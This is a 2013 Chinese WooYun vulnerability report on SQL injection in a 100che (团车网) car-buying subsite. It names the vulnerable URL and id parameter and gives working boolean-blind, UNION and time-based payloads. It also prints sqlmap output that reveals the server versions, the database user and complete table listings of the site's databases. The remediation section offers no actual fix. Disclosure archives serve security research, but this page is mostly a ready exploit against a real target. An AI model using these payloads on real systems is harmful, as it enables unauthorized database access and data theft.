当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044014

漏洞标题:团车网某分站SQL注入漏洞

相关厂商:团车网

漏洞作者: adm1n

提交时间:2013-11-25 17:04

修复时间:2014-01-09 17:05

公开时间:2014-01-09 17:05

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

团车网SQL注入漏洞

详细说明:

1.http://zt.100che.cn/bjlgh/photo.php?id=4

漏洞证明:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4 AND 5427=5427
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716e7a7371,
0x697867526e714b714966,0x716d617571),NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=4 AND SLEEP(5)
---
[15:38:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.2
back-end DBMS: MySQL 5.0.11
[15:39:37] [INFO] fetching current user
current user: 'che100@localhost'
Database: test
[26 tables]
+---------------------------------------+
| tc_apply-2013-03-28 |
| tc_news_temp-bak |
| news |
| product |
| productclass |
| tc_apply20120830 |
| tc_cars_bak |
| tc_cars_bak1205L |
| tc_cars_bak1220 |
| tc_carstyle20120906 |
| tc_cc_tasklist |
| tc_groupbu_info20120727 |
| tc_groupbuy20120717 |
| tc_groupbuy20120720 |
| tc_groupbuy_bak1205 |
| tc_groupbuy_info |
| tc_groupbuy_info20120717 |
| tc_groupbuy_info20120813 |
| tc_groupbuy_info_bak |
| tc_large_groupbuy_bak1205 |
| tc_news_temp_source_bak20121102 |
| tc_newsbak20120628 |
| tc_plantg |
| tc_poster_bak |
| tc_temporary20120717 |
| tg_groupbuy_info20120809 |
+---------------------------------------+
Database: sem
[62 tables]
+---------------------------------------+
| tc_sem_100che_campaign |
| tc_sem_100che_creative |
| tc_sem_100che_day_account |
| tc_sem_100che_day_bid |
| tc_sem_100che_day_campaign |
| tc_sem_100che_day_creative |
| tc_sem_100che_day_did |
| tc_sem_100che_day_group |
| tc_sem_100che_group |
| tc_sem_adgroup |
| tc_sem_campaign |
| tc_sem_changedadgroup |
| tc_sem_changedcampaign |
| tc_sem_changedcreative |
| tc_sem_changedkeyword |
| tc_sem_creative |
| tc_sem_day_account |
| tc_sem_day_adgroup |
| tc_sem_day_bid |
| tc_sem_day_campaign |
| tc_sem_day_creative |
| tc_sem_day_did |
| tc_sem_day_district |
| tc_sem_day_keyword |
| tc_sem_day_search |
| tc_sem_keyword |
| tc_sem_nms_ad |
| tc_sem_nms_campaign |
| tc_sem_nms_day_account |
| tc_sem_nms_day_ad |
| tc_sem_nms_day_bid |
| tc_sem_nms_day_campaign |
| tc_sem_nms_day_did |
| tc_sem_nms_day_group |
| tc_sem_nms_group |
| tc_sem_sougou_ad |
| tc_sem_sougou_campaign |
| tc_sem_sougou_day_account |
| tc_sem_sougou_day_ad |
| tc_sem_sougou_day_bid |
| tc_sem_sougou_day_campaign |
| tc_sem_sougou_day_did |
| tc_sem_sougou_day_group |
| tc_sem_sougou_group |
| tc_sem_yqmc_campaign |
| tc_sem_yqmc_creative |
| tc_sem_yqmc_day_account |
| tc_sem_yqmc_day_bid |
| tc_sem_yqmc_day_campaign |
| tc_sem_yqmc_day_creative |
| tc_sem_yqmc_day_did |
| tc_sem_yqmc_day_group |
| tc_sem_yqmc_group |
| tc_sem_yqmcnms_campaign |
| tc_sem_yqmcnms_creative |
| tc_sem_yqmcnms_day_account |
| tc_sem_yqmcnms_day_bid |
| tc_sem_yqmcnms_day_campaign |
| tc_sem_yqmcnms_day_creative |
| tc_sem_yqmcnms_day_did |
| tc_sem_yqmcnms_day_group |
| tc_sem_yqmcnms_group |
+---------------------------------------+
Database: tel
[2 tables]
+---------------------------------------+
| crm_tel_info |
| tc_district |
+---------------------------------------+
Database: che100
[108 tables]
+---------------------------------------+
| tc_car_tmp-201331 |
| tc_about |
| tc_adseat |
| tc_apply |
| tc_apply_2012 |
| tc_apply_log |
| tc_apply_log2 |
| tc_applyls |
| tc_brand |
| tc_buycar |
| tc_car_tmp |
| tc_cars |
| tc_cars_dealer |
| tc_carstyle |
| tc_carstyle_info |
| tc_cc_allottask |
| tc_cc_askabout |
| tc_cc_cooperation |
| tc_cc_exchange |
| tc_cc_kfrb |
| tc_cc_kinds |
| tc_cc_knowledge |
| tc_cc_notice |
| tc_cc_retheme |
| tc_cc_rwtj |
| tc_cc_rwtj2 |
| tc_cc_score |
| tc_cc_task |
| tc_cc_tasklist2 |
| tc_cc_visit |
| tc_cc_yyrb |
| tc_cc_yyzb |
| tc_che_tmp |
| tc_comments |
| tc_compare_che_temp |
| tc_contact |
| tc_contract |
| tc_daily |
| tc_dealer_business |
| tc_dealer_car |
| tc_dealer_exchange |
| tc_dealer_feedback |
| tc_dealer_member |
| tc_dealer_pic |
| tc_district |
| tc_groupbuy |
| tc_groupbuy_ext |
| tc_groupbuy_info |
| tc_house |
| tc_jzcar |
| tc_large_groupbuy |
| tc_lgh_base |
| tc_lgh_carshop |
| tc_lgh_mediafriend |
| tc_lgh_qa |
| tc_lgh_sales |
| tc_lgh_thanks |
| tc_lgh_upnews |
| tc_lottery |
| tc_member |
| tc_member_kill |
| tc_member_log |
| tc_message |
| tc_news |
| tc_news_counter |
| tc_news_info |
| tc_news_mood |
| tc_news_temp |
| tc_news_temp_source |
| tc_newsclass |
| tc_newsls |
| tc_notice |
| tc_phone |
| tc_photo |
| tc_pic |
| tc_plantg |
| tc_plantg_sub |
| tc_poster |
| tc_res |
| tc_role |
| tc_savegro |
| tc_search |
| tc_search_index |
| tc_sem_upinfo |
| tc_sendsms |
| tc_sj_groupbuy |
| tc_special |
| tc_subject |
| tc_subject_info |
| tc_subject_kind |
| tc_subject_question |
| tc_tags |
| tc_talkshop |
| tc_talkshop_info |
| tc_task |
| tc_temporary |
| tc_tghx |
| tc_tongji |
| tc_upinfo |
| tc_upsite |
| tc_user |
| tc_user_info |
| tc_validate_lottery |
| tc_webtj |
| tc_webtj_day |
| tc_weekly |
| tc_zt_upinfo |
| tc_ztapply |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

修复方案:

你们懂得~

版权声明:转载请注明来源 adm1n@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝